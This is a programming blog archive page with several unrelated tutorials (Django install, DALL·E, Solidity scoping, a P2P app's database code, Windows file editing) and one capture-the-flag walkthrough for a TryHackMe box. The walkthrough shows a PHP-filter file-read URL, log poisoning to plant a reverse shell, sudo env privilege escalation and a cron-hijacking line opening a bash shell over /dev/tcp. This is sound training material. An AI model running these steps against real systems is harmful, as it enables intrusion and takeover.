Programming – Page 15

Posted on March 11, 2023 by — Leave a comment

PIP Install Django – A Helpful Illustrated Guide

5/5 – (1 vote)

As a Python developer, I love using Django for web development. Its built-in features and clear code structure make building scalable and robust web applications fast and efficient. In fact, I used Django to build my own web app for Python testing and training.

Here’s how you can install Django:

pip install django

Alternatively, you may use any of the following commands to install django, depending on your concrete environment. One is likely to work!

 If you have only one version of Python installed:
pip install django  If you have Python 3 (and, possibly, other versions) installed:
pip3 install django  If you don't have PIP or it doesn't work
python -m pip install django
python3 -m pip install django  If you have Linux and you need to fix permissions (any one):
sudo pip3 install django
pip3 install django --user  If you have Linux with apt
sudo apt install django  If you have Windows and you have set up the py alias
py -m pip install django  If you have Anaconda
conda install -c anaconda django  If you have Jupyter Notebook
!pip install django
!pip3 install django

Let’s dive into the installation guides for the different operating systems and environments!

How to Install Django on Windows?

To install the updated Django framework on your Windows machine, run the following code in your command line or Powershell:

python3 -m pip install --upgrade pip
python3 -m pip install --upgrade django

Here’s the code for copy&pasting:

python3 -m pip install --upgrade pip
python3 -m pip install --upgrade django

I really think not enough coders have a solid understanding of PowerShell. If this is you, feel free to check out the following tutorials on the Finxter blog.

Related Articles:

How to Install Django on Mac?

Open Terminal (Applications/Terminal) and run:

xcode-select -install (You will be prompted to install the Xcode Command Line Tools)
sudo easy_install pip
sudo pip install django
pip install django

As an alternative, you can also run the following two commands to update pip and install the Django library:

python3 -m pip install --upgrade pip
python3 -m pip install --upgrade django

These you have already seen before, haven’t you?

Related Article:

Pip Commands — A Simple Guide

How to Install Django on Linux?

To upgrade pip and install the Django library, you can use the following two commands, one after the other.

python3 -m pip install --upgrade pip
python3 -m pip install --upgrade django

Here’s the code for copy&pasting:

python3 -m pip install --upgrade pip
python3 -m pip install --upgrade django

How to Install Django on Ubuntu?

Upgrade pip and install the Django library using the following two commands, one after the other:

python3 -m pip install --upgrade pip
python3 -m pip install --upgrade django

Here’s the code for copy&pasting:

python3 -m pip install --upgrade pip
python3 -m pip install --upgrade django

How to Install Django in PyCharm?

The simplest way to install Django in PyCharm is to open the terminal tab and run the pip install django command.

This is shown in the following code:

pip install django

Here’s a screenshot of the two steps:

Open Terminal tab in Pycharm
Run pip install django in the terminal to install Django in a virtual environment.

As an alternative, you can also search for Django in the package manager.

However, this is usually an inferior way to install packages because it involves more steps.

How to Install Django in Anaconda?

You can install the Django package with Conda using the command conda install -c anaconda django in your shell or terminal.

Like so:

 conda install -c anaconda django

This assumes you’ve already installed conda on your computer. If you haven’t check out the installation steps on the official page.

How to Install Django in VSCode?

You can install Django in VSCode by using the same command pip install django in your Visual Studio Code shell or terminal.

pip install django

If this doesn’t work — it may raise a No module named 'django' error — chances are that you’ve installed it for the wrong Python version on your system.

To check which version your VS Code environment uses, run these two commands in your Python program to check the version that executes it:

import sys
print(sys.executable)

The output will be the path to the Python installation that runs the code in VS Code.

Now, you can use this path to install Django, particularly for that Python version:

/path/to/vscode/python -m pip install django

Wait until the installation is complete and run your code using django again. It should work now!

Programmer Humor

Question: How did the programmer die in the shower? ☠

❗ Answer: They read the shampoo bottle instructions: Lather. Rinse. Repeat.

Posted on March 10, 2023 by — Leave a comment

PeerBrain – A Decentralized P2P Social Brain Network App

5/5 – (1 vote)

Join Discord: https://discord.com/invite/Cn7jWhTckP
Join GitHub: https://github.com/shandralor/PeerBrain

Posted on March 9, 2023 by — Leave a comment

I Created My First DALL·E Image in Python OpenAI Using Four Easy Steps

5/5 – (1 vote)

I have a problem. I’m addicted to OpenAI. Every day I find new exciting ways to use it. It’s like somebody gave me a magic stick and I use it for stupid things like cleaning the kitchen. But I cannot help it! So, how to create images with OpenAI in Python? Easy, follow these four steps!

Step 1: Install the OpenAI Python Library

The first step to using OpenAI’s DALL·E in Python is to install the OpenAI Python library. You can do this using pip, a package manager for Python.

Open your terminal and enter the following command:

pip install openai

I have written a whole tutorial on this topic in case this doesn’t work instantly.

Recommended: How to Install OpenAI in Python?

Step 2: Create an OpenAI API Key

OpenAI is not free for coders — but it’s almost free. I only pay a fraction of a cent for a request, so no need to be cheap here.

Visit the page https://platform.openai.com/account/api-keys and create a new OpenAI key you can use in your code. Copy&paste the API key because you’ll need it in your coding project!

Step 3: Authenticate with OpenAI API Key

Next, you’ll need to authenticate with OpenAI’s API key. You can do this by importing the openai_secret_manager module and calling the get_secret() function. This function will retrieve your OpenAI API key from a secure location, and you can use it to authenticate your API requests.

import openai_secret_manager
import openai secrets = openai_secret_manager.get_secret("openai") # Authenticate with OpenAI API Key
openai.api_key = secrets["api_key"]

If this sounds too complex, you can also use the following easier code in your code script to try it out:

import openai # Authenticate with OpenAI API Key
openai.api_key = 'sk-...'

The disadvantage is that the secret API key is plainly visible to anybody with access to your code file. Never load this code file into a repository such as GitHub!

Step 4: Generate Your DALL·E Image

Now that you’re authenticated with OpenAI, you can generate your first DALL·E image. To do this, call the openai.Image.create() function, passing in the model name, prompt, and size of the image you want to create.

import openai # Authenticate with OpenAI API Key
openai.api_key = 'sk-...' # Generate images using DALL-E
response = openai.Image.create( model="image-alpha-001", prompt="a coder learning with Finxter", size="512x512"
) print(response.data[0]['url'])

In the code above, we specified the DALL·E model we wanted to use (image-alpha-001), provided a prompt for the image we wanted to create (a coder learning with Finxter), and specified the size of the image we wanted to create (512x512).

Once you’ve generated your image, you can retrieve the image URL from the API response and display it in your Python code or in a web browser.

print(response.data[0]['url'])

Conclusion

Using OpenAI’s DALL·E to generate images is a powerful tool that can be used in various applications. So exciting!

With just a few lines of Python code, you can create unique images that match specific text descriptions. By following the four easy steps outlined in this article, you can get started generating your own DALL·E images today.

Posted on March 8, 2023 by — Leave a comment

Solidity Scoping – A Helpful Guide with Video

5/5 – (1 vote)

As promised in the previous article, we’ll get more closely familiar with the concept of scoping next. We’ll explain what scoping is, why it exists, and how it helps us in programming.

It’s part of our long-standing tradition to make this (and other) articles a faithful companion, or a supplement to the official Solidity documentation.

Scopes Overview

Scope refers to the context in which we can access a defined variable or a function. There are three main types of scope specific to Solidity:

global,
contract, and
function scope.

In the global scope, variables, and functions are defined at the global level, i.e., outside of any contract or function, and we can access them from any place in the source code.

In the contract scope, variables and functions are defined within a contract, but outside of any function, so we can access them from anywhere within the specific contract. However, these variables and functions are inaccessible from outside the contract scope.

In the function scope, variables and functions are defined within a function and we can access them exclusively from inside that function.

Note:

The concept of scopes in Solidity is similar and based on the concept of scopes in the C99 programming language. In both languages, a “scope” refers to the context in which a variable or function is defined and can be accessed.

In C99 (a C language standard from 1999), variables and functions can be defined at either the global level (i.e., outside of any function) or within a function. There is no “contract” scope in C99.

Global Scope

Let’s take a look at a simple example of the global scope:

pragma solidity ^0.6.12; uint public globalCounter; function incrementGlobalCounter() public { globalCounter++;
}

In this example, the globalCounter variable is defined at the global level and is, therefore, in the global scope. We can access it from anywhere in the code, including from within the incrementGlobalCounter(...) function.

Reminder: Global variables and functions can be accessed and modified by any contract or function that has access to them. We can find this behavior useful for sharing data across contracts or functions, but it can also present security risks if the global variables or functions are not properly protected.

Contract Scope

As explained above, variables and functions defined within a contract (but outside of any function) are in contract scope, and we can access them from anywhere within the contract.

Contract-level variables and functions are useful for storing and manipulating data that is specific to a particular contract and is not meant to be shared with other contracts or functions.

Let’s take a look at a simple example of the contract scope:

pragma solidity ^0.6.12; contract Counter { uint public contractCounter; function incrementContractCounter() public { contractCounter++; }
}

In this example, the contractCounter variable is defined within the Counter contract and is, therefore, in contract scope. It is available for access from anywhere within the Counter contract, including from within the incrementContractCounter() function.

Warning: We should be aware that contract-level variables and functions are only accessible from within the contract in which they are defined. They cannot be accessed from other contracts or from external accounts.

Function Scope

Variables and functions that are defined within a function are in the function scope and can only be accessed from within that function.

Function-level variables and functions are useful for storing and manipulating data that is specific to a particular function and is not meant to be shared with other functions or with the contract as a whole.

Let’s take a look at the following example of the function scope:

pragma solidity ^0.6.12; contract Counter { function incrementCounter(uint incrementAmount) public { uint functionCounter = 0; functionCounter += incrementAmount; }
}

In this example, the functionCounter variable is defined within the incrementCounter(...) function and is, therefore, in the function scope. It can only be accessed from within the incrementCounter function and is not accessible from other functions or from outside the contract.

C99 Scoping Rules

Now, let’s take a look at an interesting example showing minimal scoping by using curly braces:

// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.5.0 <0.9.0;
contract C { function minimalScoping() pure public { { uint same; same = 1; } { uint same; same = 3; } }
}

Each of the curly braces pair forms a distinct scope, containing a declaration and initialization of the variable same.

This example will compile without warnings or errors because each of the variable’s lifecycles is contained in its own disjoint scope, and there is no overlap between the two scopes.

Shadowing

In some special cases, such as this one demonstrating C99 scoping rules below, we’d come across a phenomenon called shadowing.

Shadowing means that two or more variables share their name and have intersected scopes, with the first one as the outer scope and the second one as the inner scope.

Let’s take a closer look to get a better idea of what’s all about:

// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.5.0 <0.9.0;
// This will report a warning
contract C { function f() pure public returns (uint) { uint x = 1; { x = 2; // this will assign to the outer variable uint x; } return x; // x has value 2 }
}

There are two variables called x; the first one is in the outer scope, and the second one is in the inner scope.

The inner scope is contained in or surrounded by the outer scope.

Therefore, the first and the second assignment assign the value 1, and then value 2 to the outer variable x, and only then will the declaration of the second variable x take place.

In this specific case, we’d get a warning from the compiler, because the first (outer) variable x is being shadowed by the second variable x.

Warning: in versions prior to 0.5.0, Solidity used the same scoping rules as JavaScript: a variable declared at any location within the function would be visible through the entire function’s scope. That’s why the example below could’ve been compiled in Solidity versions before 0.5.0:

// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.5.0 <0.9.0;
// This will not compile
contract C { function f() pure public returns (uint) { x = 2; uint x; return x; }
}

The code above couldn’t compile in today’s versions of Solidity because an assignment to variable x is attempted before the variable itself is declared. In other words, the inner variable x‘s scope starts with the line of its declaration.

Conclusion

In this article, we learned about variable and function scopes.

First, we made a scope overview, introducing ourselves to three different scopes in Solidity.
Second, we investigated the global scope by studying an appropriate example.
Third, we looked at the contract scope through an appropriate example.
Third, learned about the function scope on an appropriate example.
Fourth, we glanced at C99 scoping rules based on C99 – a C language standard.
Fifth, we also learned about shadowing and got an idea of why we should be careful about it.

What’s Next?

This tutorial is part of our extended Solidity documentation with videos and more accessible examples and explanations. You can navigate the series here (all links open in a new tab):

Prev Tutorial

Syllabus

Next Tutorial

Posted on March 7, 2023 by — Leave a comment

My Journey to Help Build a P2P Social Network – Database Code Structure

5/5 – (1 vote)

Welcome to part 3 of this series, and thank you for sticking around!

I’ve come to realize this might become a rather long series. The main reason for that is that it documents two things. This is the birth of an application and my personal journey in developing that application. I know parts 1 and 2 have been very wordy. This will change now. I promise that you will see a lot of code in this episode :-).

Database Code

So after that slight philosophical tidbit, it is time to dive into the actual database code. As I mentioned in the previous article, I chose to use Deta Space as the database provider. There are two reasons for this. The first is the ease of use and the second are its similarities to my favorite NoSQL database MongoDB.

Recommended: Please check my article on creating a shopping list in Streamlit on how to set it up. It takes only a few minutes.

For reference, the server directory with all the code to get the FastAPI server working looks as follows:

server
├── db.py
├── main.py
├── models.py
├── requirements.txt
├── .env

All the database code will live in the db.py file. For the Pydantic models, I’ll use models.py.

Database Functions

The database functions are roughly divided into three parts.

We first need functionality for everything related to users.
Next, we need to code that handles everything related to adding and managing friends.
The third part applies to all the code for managing thoughts. Thoughts are Peerbrain’s equal of messages/tweets.

The file will also contain some helper functions to aid with managing the public keys of users. I’ll go into a lot more detail on this in the article about encryption.

To set up our db.py file we first need to import everything needed. As before, I’ll show the entire list and then explain what everything does once we write code that uses it.

"""This file will contain all the database logic for our server module. It will leverage the Deta Base NoSQL database api.""" from datetime import datetime
import math
from typing import Union
import os
import logging
from pprint import pprint #pylint: disable=unused-import
from uuid import uuid4
from deta import Deta
from dotenv import load_dotenv
from passlib.context import CryptContext

The #pylint comment you can see above is used to make sure pylint skips this import. I use pprint for displaying dictionaries in a readable way when testing. As I don’t use it anywhere in the actual code, pylint would start to fuss otherwise.

Tip: For those interested, pylint is a great tool to check your code for consistency, errors and, code style. It is static, so it can’t detect errors occurring at runtime. I like it even so.

After having imported everything, I first initialize the database. The load_dotenv() below, first will load all my environment variables from the .env file.

load_dotenv() #---DB INIT---#
DETA_KEY = os.getenv("DETA_KEY")
deta = Deta(DETA_KEY)
#---#
USERS = deta.Base("users")
THOUGHTS = deta.Base("thoughts")
KEYS = deta.Base("keys_db")

Once the variables are accessible, I can use the Deta API key to initialize Deta. Creating Bases in Deta is as easy as defining them with deta.Base. I can now call the variable names to perform CRUD operations when needed.

Generate Password Hash

The next part is very important. It will generate our password hash so the password is never readable. Even if someone has control of the database itself, they will not be able to use it. Cryptcontext itself is part of the passlib library. This library can hash passwords in multiple ways..

#---PW ENCRYPT INIT---#
pwd_context = CryptContext(schemes =["bcrypt"], deprecated="auto")
#---#
def gen_pw_hash(pw:str)->str: """Function that will use the CryptContext module to generate and return a hashed version of our password""" return pwd_context.hash(pw)

User Functions

The first function of the user functions is the easiest. It uses Deta’s fetch method to retrieve all objects from a certain Base, deta.users, in our case.

#---USER FUNCTIONS---#
def get_users() -> dict: """Function to return all users from our database""" try: return {user["username"]: user for user in USERS.fetch().items} except Exception as e: # Log the error or handle it appropriately print(f"Error fetching users: {e}") return {}

The fact that the function returns the found users as a dictionary makes them easy to use with FastAPI. As we contact a database in this function and all the others in this block, a try–except block is necessary.

The next two functions are doing the same thing but with different parameters. They accept either a username or an email.

I am aware that these two could be combined into a single function with an if-statement. I still do prefer the two separate functions, as I find them easier to use. Another argument I will make is also that the email search function is primarily an end user function. I plan to use searching by username in the background as a helper function for other functionality.

def get_user_by_username(username:str)->Union[dict, None]: """Function that returns a User object if it is in the database. If not it returns a JSON object with the message no user exists for that username""" try: if (USERS.fetch({"username" : username}).items) == []: return {"Username" : "No user with username found"} else: return USERS.fetch({"username" : username}).items[0] except Exception as error_message: logging.exception(error_message) return None def get_user_by_email(email:str)->Union[dict, None]: """Function that returns a User object if it is in the database. If not it returns a JSON object with the message no user exists for that email address""" try: if (USERS.fetch({"email" : email}).items) == []: return {"Email" : "No user with email found"} else: return USERS.fetch({"email" : email}).items[0] except Exception as error_message: logging.exception(error_message) return None

The functions above both take a parameter that they use to filter the fetch request to the Deta Base users.

If that filtering results in an empty list a proper message is returned. If the returned list is not empty, we use the .items method on the fetch object and return the first item of that list. In both cases, this will be the user object that contains the query string (email or username).

The entire sequence is run inside a try-except block as we are trying to contact a database.

Reset User Password

When working with user creation and databases, a function to reset a user’s password is required. The next function will take care of that.

def change_password(username, pw_to_hash): """Function that takes a username and a password in plaintext. It will then hash that password> After that it creates a dictionary and tries to match the username to users in the database. If successful it overwrites the previous password hash. If not it returns a JSON message stating no user could be found for the username provided.""" hashed_pw = gen_pw_hash(pw_to_hash) update= {"hashed_pw": hashed_pw } try: user = get_user_by_username(username) user_key = user["key"] if not username in get_users(): return {"Username" : "Not Found"} else: return USERS.update(update, user_key), f"User {username} password changed!" except Exception as error_message: logging.exception(error_message) return None

This function will take a username and a new password. It will first hash that password and then create a dictionary. Updates to a Deta Base are always performed by calling the update method with a dictionary. As in the previous functions, we always check if the username in question exists before calling the update. Also, don’t forget the try-except block!

Create User

The last function is our most important one :-). You can’t perform any operations on user objects if you have no way to create them! Take a look below to check out how we’ll handle that.

def create_user(username:str, email:str, pw_to_hash:str)->None: """Function to create a new user. It takes three strings and inputs these into the new_user dictionary. The function then attempts to put this dictionary in the database""" new_user = {"username" : username, "key" : str(uuid4()), "hashed_pw" : gen_pw_hash(pw_to_hash), "email" : email, "friends" : [], "disabled" : False} try: return USERS.put(new_user) except Exception as error_message: logging.exception(error_message) return None

The user creation function will take a username, email, and password for now. It will probably become more complex in the future, but it serves our purposes for now. Like the Deta update method, creating a new item in the database requires a dictionary. Some of the necessary attributes for the dictionary are generated inside the function.

The key needs to be unique, so we use Python’s uuid4 module. The friend’s attribute will contain the usernames of other users but starts as an empty list. The disabled attribute, finally, is set to false.

After finishing the initialization, creating the object is a matter of calling the Deta put method. I hear some of you thinking that we don’t do any checks if the username or email already exists in the database. You are right, but I will perform these checks on the endpoint receiving the post request for user creation.

Some Coding Thoughts and Learnings

GitHub Join the open-source PeerBrain development community!

One thing that never ceases to amaze me is the amount of documentation I like to add. I do this first in the form of docstrings as it helps me keep track of what function does what. I find it boring most of the time, but in the end, it helps a lot!

The other part of documenting that I like is type hints. I admit they sometimes confuse me still, but I can see the merit they have when an application keeps growing.

We will handle the rest of the database function in the next article. See you there!

Participate in Building the Decentralized Social Brain Network

As before, I state that I am completely self-taught. This means I’ll make mistakes. If you spot them, please post them on Discord so I can remedy them .

As always, feel free to ask me questions or pass suggestions! And check out the GitHub repository for participation!

GitHub: https://github.com/shandralor/PeerBrain

Posted on March 6, 2023 by — Leave a comment

Cracking the Code to a Better Life: How Learning to Code Can Satisfy the 8 Life Forces

5/5 – (1 vote)

As human beings, we are driven by a number of basic needs and desires that motivate us to take action and pursue our goals. This includes things like survival, enjoyment of life, sexual companionship, comfortable living conditions, and more.

I believe learning to code is a powerful way to satisfy many of these profound life forces. Let’s go over them one by one as a small exercise to keep you motivated for the week!

Life Forces #1 – Survival, Enjoyment of Life, Life Extension

By learning to code, you can position yourself to take advantage of the many job opportunities that exist in the tech industry, which can provide you with the financial resources you need to support yourself and your loved ones.

The median annual income of a software developer in the US is $120,730, compared to a median income overall of $41,535. No need to say more on this point!

Recommended: Income of Freelance Developer

Additionally, coding can be a fun and rewarding hobby that can help you stay mentally sharp and engaged with the world around you.

Life Forces #2 – Comfortable Living Conditions

By developing skills in programming, prompting, tech, blockchain development, and machine learning, you can position yourself to take advantage of the many high-paying job opportunities that exist in these fields, which can help you achieve the comfortable living conditions you desire.

Life Forces #3 – To Be Superior and Winning

Don’t underestimate the motivational power of this basic need of human beings!

By mastering the latest programming languages, tools, and techniques, you can position yourself as an expert in your field and achieve a sense of superiority and accomplishment that can drive you to greater success.

Imagine being able to command the power of infinite leverage by programming computers. Wouldn’t controlling an army of artificially intelligent entities help you win?

Life Forces #4 – Sexual Companionship

While learning to code may not directly impact your ability to find sexual companionship, it can provide you with the financial resources and independence you need to pursue romantic relationships on your own terms.

It’s also a status game, after all.

In researching this hypotheses for the purpose of this post, I came across lots of scientifical evidence on this topic such as Zhang 2022:

“We found that men with higher social status were more likely to have long-term mating and reproductive success”

DYR!

Life Forces #5 – Freedom From Fear, Pain, and Danger

By achieving financial security and stability through your coding skills, you can achieve a sense of freedom from fear, pain, and danger that can allow you to pursue your dreams and passions without undue worry or stress.

In fact, creating my own coding business online — starting out as a freelance developer on Upwork — has given me all the freedom I ever dreamed of!

Recommended: Read my story here

Life Forces #6 – Care And Protection of Loved Ones

By achieving financial success through your coding skills, you can provide for and protect your loved ones, ensuring they have the resources and security they need to thrive.

Life Forces #7 – Social Approval

By mastering programming, tech, blockchain development, and machine learning skills, you can achieve a sense of social approval and validation from your peers and colleagues, who will respect and admire your expertise and achievements.

Conclusion

In short, learning to code can satisfy many of the life forces that drive us as human beings, and can provide you with the skills and resources you need to achieve success and fulfillment in all areas of your life.

If you’re looking to take your career and life to the next level, I encourage you to check out our academy‘s courses on programming, tech, blockchain development, ChatGPT, freelancing, and machine learning. They can help you achieve your goals and create the life you’ve always dreamed of.

Thank you for being a part of our community, and we look forward to supporting you on your journey to success and fulfillment.

Posted on March 5, 2023 by — Leave a comment

TryHackMe DogCat Walkthrough [+ Easy Video]

5/5 – (1 vote)

CHALLENGE OVERVIEW

Link: THM Dogcat
Difficulty: Medium
Target: Flags 1-4
Highlight: intercepting and modifying a web request using burpsuite
Tools used: base64, burpsuite
Tags: docker, directory traversal

BACKGROUND

In this tutorial, we will walk a simple website showing pictures of dogs and cats.

We’ll discover a directory traversal vulnerability that we can leverage to view sensitive files on the target machine.

At the end of this challenge, we will break out of a docker container in order to capture the 4th and final flag.

ENUMERATION/RECON

export target=10.10.148.135
Export myIP=10.6.2.23

Let’s walk the site.

It looks like a simple image-viewing site that can randomize images of dogs and cats. After toying around with the browser addresses, we find that directory traversal allows us to view other files.

Let’s see if we can grab the HTML code that processes our parameters in the browser address. This will help us understand what is happening on the backend.

We’ll use a simple PHP filter to convert the contents to base64 and output the raw base64 string.

http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../index

Raw output:

PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg==

Let’s save this string as a file named “string”. Then we can use the command “cat string | base64 -d” to decrypt this string and view it as raw HTML code.

Reading over this HTML code, we can see that the file extension can be set!

If the user doesn’t specify the extension, the default will be .php. This means that we can add “&ext=” to the end of our web address to avoid the .php extension from being added.

In order for it to properly display our request, we need to include the word “dog” or “cat” in the address.

Let’s dive in with burpsuite and start intercepting and modifying requests.

Here is our order of steps for us to get our initial foothold on the target machine:

Create a PHP reverse shell
Start up our netcat listener
Use burp to intercept and modify the web request. Wait until later to click “forward”.
Spin up a simple HTTP server with Python in the same directory as the PHP revshell.
Click “forward” on burp to send the web request.
Activate the shell by entering: $targetIP/bshell.php in the browser address
Catch the revshell on netcat!

STEP 1

Let’s create a PHP pentest monkey revshell.

STEP 2

Let’s first start up a netcat listener on port 2222.

nc -lnvp 2222

STEP 3

Intercept the web request for the Apache2 log and modify the User-Agent field with a PHP code to request the shell.php code and rename it bshell.php on the target machine.

This will work only because upon examining the Apache2 logs, we noticed that the User-Agent field is unencoded and vulnerable to command injection. Make sure to wait to click forward until step 5.

STEP 4

We’ll spin up a simple python HTTP server in the same directory as our revshell to serve shell.php to our target machine via the modified web request we created in burpsuite.

STEP 5

Click forward on burp and check to see if code 200 came through for shell.php on the HTTP server.

STEP 6

We can activate the shell from our browser now and hopefully catch it as a revshell on our netcat listener.

STEP 7

We successfully caught it! Now we are in with our initial foothold!

INITIAL FOOTHOLD

LOCATE THE FIRST FLAG

Let’s grab the first flag. We can grab it from our browser again in base64, or via the command line from the revshell.

http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../flag
PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=

Now we can decode this string (saved as firstflag.txt) with base64:

base64 --decode firstflag.txt <?php
$flag_1 = "THM{Th—------------ommitted—-------fa}"
?>

LOCAL RECON

LOCATE THE SECOND FLAG

We manually enumerate the filesystem and discover the second flag at /var/www/flag2_QMW7JvaY2LvK.txt

Using the command find can help us quickly scan the filesystem for any files which contain the word “flag”.

find / -type f -name '*flag*' 2>/dev/null

We found the second flag in plaintext!

cat flag2_QMW7JvaY2LvK.txt
THM{LF—------------ommitted—-------fb}

CHECK SUDO PERMISSIONS

Let’s check out our sudo permissions with the command:

sudo -l
Matching Defaults entries for www-data on 26e23794a52b: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on 26e23794a52b: (root) NOPASSWD: /usr/bin/env

EXPLOIT/PRIVILEGE ESCALATION

Because we have sudo permissions without a password to run the env bin, we can easily become root with the command:

$ sudo env /bin/bash

Now we can verify that we are root with the command whoami.

GRAB THE THIRD FLAG

cd /root
ls
flag3.txt
cat flag3.txt
THM{D1—------------ommitted—-------12}

POST-EXPLOITATION – BREAK OUT OF THE DOCKER CONTAINER

Let’s start up a new listener to catch the new bash shell outside of the container.

nc -lnvp 3333

We notice that there is a backup.sh that regularly runs on a schedule via cronjobs. We can hijack this file which is run by root outside of the docker container, by changing the contents to throw a revshell.

echo "#!/bin/bash">backup.sh;echo "bash -i>/dev/tcp/10.6.2.23/3333 0>&1">>backup.sh
flag4.txt
cat flag4.txt
THM{esc—------------ommitted—-------2d}

FINAL THOUGHTS

This box was a lot of fun. The bulk of the challenge was working towards gaining the initial foothold.

Once we secured a revshell, the rest of the box went pretty quickly.

The final step of breaking out of a docker container with a second revshell was the sneakiest part for me.

The PHP directory traversal and using a php filter to encode with base64 was also a cool way to evade the data sanitation measures in place on the backend.

Posted on March 4, 2023 by — Leave a comment

5 Easy Ways to Edit a Text File From Command Line (Windows)

5/5 – (1 vote)

Problem Formulation

Given is a text file, say my_file.txt. How to modify its content in your Windows command line working directory?

I’ll start with the most direct method to solve this problem in 90% of cases and give a more “pure” in-terminal method afterward.

Method 1: Using Notepad

The easiest way to edit a text file in the command line (CMD) on your Windows machine is to run the command notepad.exe my_text_file.txt, or simply notepad my_text_file.txt, in your cmd to open the text file with the visual editor Notepad.

notepad.exe my_file.txt

You can also skip the .exe prefix in most cases:

notepad my_text_file.txt

Now, you may ask:

Is Notepad preinstalled in any Windows installation? The answer is: yes! Notepad is a generic text editor to create, open, and read plaintext files and it’s included with all Windows versions.

Here’s how that looks on my Win 10 machine:

When I type in the command notepad.exe my_text_file.txt, CMD starts the Notepad visual editor in a new window.

I can then edit the file and hit CTRL + S to save the new contents.

But what if you cannot open a text editor—e.g. if you’re logged into a remote server via SSH?

Method 2: Pure CMD Approach

If you cannot open Notepad or other visual editors for some reason, a simple way to overwrite a text file with built-in Windows command line tools is the following:

Run the command echo 'your new content' > my_file.txt to print the new content using echo and pipe the output into the text file my_text_file.txt using >.
Check the new content using the command type my_text_file.txt.

C:\Users\xcent\Desktop>echo 'hello world' > my_file.txt
C:\Users\xcent\Desktop>type my_file.txt 'hello world'

Here’s what this looks like on my Windows machine, where I changed my_file.txt to contain the text 'hello world!':

This is a simple and straightforward approach to small changes. However, if you have a large file and you just want to edit some minor details, this is not the best way.

Method 3: Change File Purely In CMD (Copy Con)

If you need a full-fledged solution to edit potentially large files in your Windows CMD, use this method!

To create a new file in Windows command prompt, enter copy con followed by the target file name (copy con my_file.txt). Then enter the text you want to put in the file. To end and save the file, press Ctrl+Z then Enter or F6 then Enter.

copy con my_file.txt

How this looks on my Win machine:

A couple of notes:

Info: To edit an existing file, display the text by using the type command followed by the file name. Then copy and paste the text into the copy con command to make changes. Be careful not to make any typos, or you’ll have to start over again. Backspace works if you catch the mistake before pressing Enter. Note that this method may not work in PowerShell or other command line interfaces that don’t support this feature.

Method 4: If you SSH’d to a Unix Machine

Of course, if you have logged in a Unix-based machine, you don’t need to install any editor because it comes with powerful integrated editors such as vim or emacs.

One of the following three commands should open your file in a terminal-based editing mode:

vim my_text_file.txt
vi my_text_file.txt
emacs my_text_file.txt

You can learn more about Vim here.

Summary

To edit a file.txt in the command line, use the command notepad file.txt to open a graphical editor on Windows.

If you need a simple file edit in your terminal without a graphical editor and without installation, you can use the command echo 'new content' > file.txt that overwrites the old content in file.txt with new content.

If you need a more direct in-CMD text editor run copy con file.txt to open the file in editing mode.

If you’re SSH’d into a Unix machine, running the Vim console-based editor may be the best idea. Use vim file.txt or vi file.txt to open it.

Feel free to join our email coding academy (it’s free):

Posted on March 2, 2023 by — Leave a comment

Building a Q&A Bot with OpenAI: A Step-by-Step Guide to Scraping Websites and Answer Questions

5/5 – (2 votes)

Have you ever found yourself deep in the internet rabbit hole, searching for an answer to a question that just won’t quit?

It can be frustrating to sift through all the online information and still come up empty-handed. But what if there was a way to get accurate and reliable answers in a snap? Enter the Q&A bot – your new best friend for all your pressing questions!

In this blog, we will take you on a wild ride to show you how to build your very own Q&A bot using OpenAI’s language models. We’ll guide you through the process of scraping text from a website, processing it, and using OpenAI’s language models to find the answers you seek.

And let’s face it, who doesn’t love having a robot friend that can answer all their burning questions? So buckle up and let’s build a quirky, lovable Q&A bot together!

You can check out the whole code project on the GitHub (cookbook). I’ll explain the steps in the following

Overview

This tutorial presents a Python script that

